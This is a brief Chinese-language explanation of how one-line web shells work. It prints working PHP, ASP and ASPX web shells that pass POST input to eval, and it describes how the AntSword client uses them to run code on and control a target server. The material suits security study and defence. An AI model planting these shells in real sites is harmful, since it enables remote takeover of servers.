分析 PHP 一句话木马的原理:
php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话木马是: <%eval request ("pass")%>
aspx的一句话木马是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
总结:蚁剑通过连接一句话木马,每个功能操作,都是通过 POST 方式传递不同的执行代码给一句话木马,当一句话木马接收到蚁剑提交过来的数据(也就是代码),通过 eval 函数在目标服务器上执行,从而实现了控制目标服务器。